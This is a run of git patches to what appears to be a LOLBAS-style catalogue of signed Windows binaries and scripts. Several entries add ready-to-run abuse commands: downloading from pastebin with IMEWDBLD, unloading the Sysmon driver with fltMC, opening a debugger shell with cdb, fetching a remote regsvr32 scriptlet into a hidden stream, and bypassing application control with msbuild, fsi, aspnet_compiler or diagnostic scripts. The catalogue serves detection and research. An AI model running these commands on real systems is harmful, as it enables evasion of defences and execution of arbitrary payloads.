MitreID: T1085 diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 63b335a..1ea9d18 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). - UseCase: Launch an HTA application. + Usecase: Launch an HTA application. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 8a96d19..01162da 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe Description: Launch executable by calling the LaunchApplication function. - UseCase: Launch an executable. + Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index a5b1655..59036f1 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. + Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1085 @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. - UseCase: Load an executable payload. + Usecase: Load an executable payload. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 7aeb700..30bd365 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index d4f554c..3b41678 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll Description: Launch a DLL payload by calling the Control_RunDLL function. - UseCase: Load a DLL payload. + Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1085 @@ -14,14 +14,14 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe Description: Launch an executable by calling the ShellExec_RunDLL function. - UseCase: Run an executable payload. + Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1085 MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" Description: Launch command line by calling the ShellExec_RunDLL function. - UseCase: Run an executable payload. + Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index 9f8cb02..6dbfe1c 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification (Note May pop an error window). + Usecase: Run local or remote script(let) code through INF file specification (Note May pop an error window). Category: AWL Bypass Privileges: User MitreID: T1085 @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. - UseCase: Load an executable payload. + Usecase: Load an executable payload. Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index d8164b6..e58d7ca 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" Description: Launch a HTML application payload by calling OpenURL. - UseCase: Invoke an HTML Application via mshta.exe (Default Handler). + Usecase: Invoke an HTML Application via mshta.exe (Default Handler). Category: Execute Privileges: User MitreID: T1085 @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. + Usecase: Load an executable payload by calling a .url file with or without quotes. Category: Execute Privileges: User MitreID: T1085 @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling OpenURL. - UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). + Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). Category: Execute Privileges: User MitreID: T1085 @@ -30,7 +30,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe Description: Launch an executable by calling FileProtocolHandler. - UseCase: Launch an executable. + Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1085 @@ -38,7 +38,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling FileProtocolHandler. - UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). + Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). Category: Execute Privileges: User MitreID: T1085 @@ -46,7 +46,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta Description: Launch a HTML application payload by calling FileProtocolHandler. - UseCase: Invoke an HTML Application via mshta.exe (Default Handler). + Usecase: Invoke an HTML Application via mshta.exe (Default Handler). Category: Execute Privileges: User MitreID: T1085 diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index d72ecf1..eafe22f 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -6,7 +6,7 @@ Created: 2018-05-25 Commands: - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe Description: Launch an executable payload by calling RouteTheCall. - UseCase: Launch an executable. + Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1085 @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable payload by calling RouteTheCall (obfuscated). - UseCase: Launch an executable. + Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1085 From 3ca7bdc5422c3fe710ff54fc18401e9b5b61f190 Mon Sep 17 00:00:00 2001 From: ahmad Date: Fri, 22 Jan 2021 06:33:58 -0500 Subject: [PATCH 08/19] Fixed the url --- yml/OtherMSBinaries/Adplus.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index d3095d9..9857834 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -20,7 +20,7 @@ Code_Sample: Detection: - IOC: Resources: - - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ + - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/ Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' From 84de927a839510b52bbbd4b04c82be12ed222d03 Mon Sep 17 00:00:00 2001 From: SpookySec Date: Mon, 8 Feb 2021 16:28:25 +0300 Subject: [PATCH 09/19] edited cdb.yml --- yml/OtherMSBinaries/Cdb.yml | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 2411a0d..a5edabc 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -12,6 +12,16 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows + - Command: | + cdb.exe -pd -pn + .shell + Description: Attaching to any process and executing shell commands + Usecase: Run a shell command under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe @@ -23,7 +33,12 @@ Resources: - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda + - Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/ Acknoledgement: - Person: Matt Graeber Handle: '@mattifestation' ---- \ No newline at end of file + - Person: mr.d0x + Handle: '@mrd0x' + - Person: Spooky Sec + Handle: '@spooky_sec' +--- From d539a7dacd33bdcb7bde8056dedcb5f86ceab4de Mon Sep 17 00:00:00 2001 From: SpookySec Date: Fri, 12 Feb 2021 22:26:16 +0300 Subject: [PATCH 10/19] edited cdb.yml --- yml/OtherMSBinaries/Cdb.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index a5edabc..32830c2 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -40,5 +40,5 @@ Acknoledgement: - Person: mr.d0x Handle: '@mrd0x' - Person: Spooky Sec - Handle: '@spooky_sec' + Handle: '@sec_spooky' --- From 782bc68c7cb77073caf2fb0817fad31461cf9597 Mon Sep 17 00:00:00 2001 From: whickey-r7 <32334421+whickey-r7@users.noreply.github.com> Date: Fri, 5 Mar 2021 11:35:06 -0500 Subject: [PATCH 11/19] Create IMEWDBLD.yml --- yml/OSBinaries/IMEWDBLD.yml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 yml/OSBinaries/IMEWDBLD.yml diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml new file mode 100644 index 0000000..e1167c1 --- /dev/null +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -0,0 +1,22 @@ +--- +Name: IMEWDBLD.exe +Description: Microsoft IME Open Extended Dictionary Module +Author: 'Wade Hickey' +Created: '2020-03-05' +Commands: + - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw + Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe +Resources: + - Link: https://twitter.com/notwhickey/status/1367493406835040265 +Acknowledgement: + - Person: Wade Hickey + Handle: '@notwhickey' +--- From bbf14cf4b9ed7d9e2c680632590551bb9972095c Mon Sep 17 00:00:00 2001 From: Parker McGee <232132+pgmcgee@users.noreply.github.com> Date: Sat, 20 Mar 2021 16:40:37 -0400 Subject: [PATCH 12/19] Fix a typo in Findstr.yml `finstr.exe` should be `findstr.exe` --- yml/OSBinaries/Findstr.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 95668b9..35f823c 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -42,11 +42,11 @@ Full_Path: Code_Sample: - Code: Detection: - - IOC: finstr.exe should normally not be invoked on a client system + - IOC: findstr.exe should normally not be invoked on a client system Resources: - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- From ebf494ae4debab34e6f1d92d6613792ba79fbcb5 Mon Sep 17 00:00:00 2001 From: Efraim-Kaplan <54638674+Efraim-Kaplan@users.noreply.github.com> Date: Fri, 2 Jul 2021 17:33:53 -0400 Subject: [PATCH 13/19] FIxed typo Replaced "handeling" with "handling". --- yml/OSBinaries/Certutil.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index d66a264..414e531 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -1,6 +1,6 @@ --- Name: Certutil.exe -Description: Windows binary used for handeling certificates +Description: Windows binary used for handling certificates Author: 'Oddvar Moe' Created: '2018-05-25' Commands: From 87c3319ad4797c1160b259f82fcb0330fa312816 Mon Sep 17 00:00:00 2001 From: Josh Brower Date: Tue, 6 Jul 2021 13:56:24 -0400 Subject: [PATCH 14/19] Fix ART link --- yml/OSBinaries/Cmd.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index 1fc9f9f..a951c7a 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml @@ -4,7 +4,7 @@ Description: The command-line interpreter in Windows Author: 'Ye Yint Min Thu Htut' Created: '2019-06-26' Commands: - - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat + - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat Description: Add content to an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS From ecbc2f817f20c8687cdd0c3a60a584004958f751 Mon Sep 17 00:00:00 2001 From: John Lambert Date: Sat, 18 Sep 2021 17:43:59 -0700 Subject: [PATCH 15/19] Add lolbin for fltMC.exe Used by redteams for defense evasion to disable drivers used by agents like sysmon https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon https://github.com/oddcod3/Phantom-Evasion/blob/master/Modules/post-exploitation/Postex_CMD_UnloadSysmonDriver_windows.py --- yml/OSBinaries/fltMC.yml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 yml/OSBinaries/fltMC.yml diff --git a/yml/OSBinaries/fltMC.yml b/yml/OSBinaries/fltMC.yml new file mode 100644 index 0000000..c22696a --- /dev/null +++ b/yml/OSBinaries/fltMC.yml @@ -0,0 +1,26 @@ +--- +Name: fltMC.exe +Description: Filter Manager Control Program used by Windows +Author: 'John Lambert' +Created: '2021-09-18' +Commands: + - Command: fltMC.exe unload SysmonDrv + Description: Unloads a driver used by security agents + Usecase: Defense evasion + Category: ADS + Privileges: Admin + MitreID: T1562 + MitreLink: https://attack.mitre.org/techniques/T1562/002/ + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\System32\fltMC.exe +Code_Sample: +- Code: +Detection: + - IOC: 4688 events with fltMC.exe +Resources: + - Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon +Acknowledgement: + - Person: Carlos Perez + Handle: '@Carlos_Perez' +--- From 559d9bc3ff0969f450ec2adb8423f63a25b8e7fe Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Fri, 24 Sep 2021 15:28:01 +0800 Subject: [PATCH 16/19] Create VSIISExeLauncher.yml --- yml/OtherMSBinaries/VSIISExeLauncher.yml | 26 ++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 yml/OtherMSBinaries/VSIISExeLauncher.yml diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml new file mode 100644 index 0000000..5c92f3d --- /dev/null +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -0,0 +1,26 @@ +--- +Name: VSIISExeLauncher.exe +Description: Binary will execute specified binary. Part of VS/VScode installation. +Author: 'timwhite' +Created: '2021-09-24' +Commands: + - Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here" + Description: The above binary will execute other binary. + Usecase: Execute any binary with given arguments. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 and up with VS/VScode installed +Full_Path: + - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe' +Code_Sample: + - Code: +Detection: + - IOC: VSIISExeLauncher.exe spawned an unknown process +Resources: + - Link: +Acknowledgement: + - Person: timwhite + Handle: +--- From 9336b4d599c241d86720a6e9b833f9dc173d4cd4 Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Fri, 24 Sep 2021 15:28:39 +0800 Subject: [PATCH 17/19] Update VSIISExeLauncher.yml --- yml/OtherMSBinaries/VSIISExeLauncher.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 5c92f3d..33d36a5 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -19,7 +19,7 @@ Code_Sample: Detection: - IOC: VSIISExeLauncher.exe spawned an unknown process Resources: - - Link: + - Link: https://github.com/timwhitez Acknowledgement: - Person: timwhite Handle: From b5357cdec00bbfe4e714fa227da2230a27d70918 Mon Sep 17 00:00:00 2001 From: root Date: Sun, 26 Sep 2021 23:31:30 -0400 Subject: [PATCH 18/19] Adding app-ctrl bypass bins and a few lolscripts --- yml/OSBinaries/Aspnet_Compiler.yml | 28 ++++++++++++++ yml/OSBinaries/Msbuild.yml | 12 ++++++ yml/OSScripts/CL_LoadAssembly.yml | 30 +++++++++++++++ yml/OSScripts/UtilityFunctions.yml | 26 +++++++++++++ yml/OtherMSBinaries/Fsi.yml | 38 +++++++++++++++++++ yml/OtherMSBinaries/FsiAnyCpu.yml | 36 ++++++++++++++++++ yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 31 +++++++++++++++ yml/OtherMSBinaries/Wfc.yml | 28 ++++++++++++++ 8 files changed, 229 insertions(+) create mode 100644 yml/OSBinaries/Aspnet_Compiler.yml create mode 100644 yml/OSScripts/CL_LoadAssembly.yml create mode 100644 yml/OSScripts/UtilityFunctions.yml create mode 100644 yml/OtherMSBinaries/Fsi.yml create mode 100644 yml/OtherMSBinaries/FsiAnyCpu.yml create mode 100644 yml/OtherMSBinaries/VisualUiaVerifyNative.yml create mode 100644 yml/OtherMSBinaries/Wfc.yml diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml new file mode 100644 index 0000000..7cbd821 --- /dev/null +++ b/yml/OSBinaries/Aspnet_Compiler.yml @@ -0,0 +1,28 @@ +--- +Name: Aspnet_Compiler.exe +Description: ASP.NET Compilation Tool +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u + Description: Execute C# code with the Build Provider and proper folder structure in place. + Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 +Full_Path: + - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe +Code_Sample: + - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ + - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 +Acknowledgement: + - Person: cpl + Handle: '@cpl3h' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index b5bfbe5..5b4deca 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -20,6 +20,14 @@ Commands: MitreID: T1127 MitreLink: https://attack.mitre.org/wiki/Technique/T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: msbuild.exe project.proj + Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. + Usecase: Execute project file that contains XslTransformation tag parameters + Category: Execute + Privileges: User + MitreID: T1127 + MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe @@ -27,6 +35,7 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe + - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe Code_Sample: - Code: Detection: @@ -36,9 +45,12 @@ Resources: - Link: https://github.com/Cn33liz/MSBuildShell - Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191 Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Cn33liz Handle: '@Cneelis' + - Person: Jimmy + Handle: '@bohops' --- \ No newline at end of file diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml new file mode 100644 index 0000000..4bc7719 --- /dev/null +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -0,0 +1,30 @@ +--- +Name: CL_LoadAssembly.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1059.001 + MitreLink: https://attack.mitre.org/techniques/T1059/001/ + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' +--- + + + +powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; RegSnapin ..\..\..\..\testing\fun.dll;[Program.Class]::Fun() \ No newline at end of file diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml new file mode 100644 index 0000000..8f92417 --- /dev/null +++ b/yml/OSScripts/UtilityFunctions.yml @@ -0,0 +1,26 @@ +--- +Name: UtilityFunctions.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1059.001 + MitreLink: https://attack.mitre.org/techniques/T1059/001/ + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/nickvangilder/status/1441003666274668546 +Acknowledgement: + - Person: Nick VanGilder + Handle: '@nickvangilder' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml new file mode 100644 index 0000000..66f55f7 --- /dev/null +++ b/yml/OtherMSBinaries/Fsi.yml @@ -0,0 +1,38 @@ +--- +Name: Fsi.exe +Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsi.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsi.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://twitter.com/NickTyrer/status/904273264385589248 + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml new file mode 100644 index 0000000..855f7d7 --- /dev/null +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml @@ -0,0 +1,36 @@ +--- +Name: FsiAnyCpu.exe +Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsianycpu.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsianycpu.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file 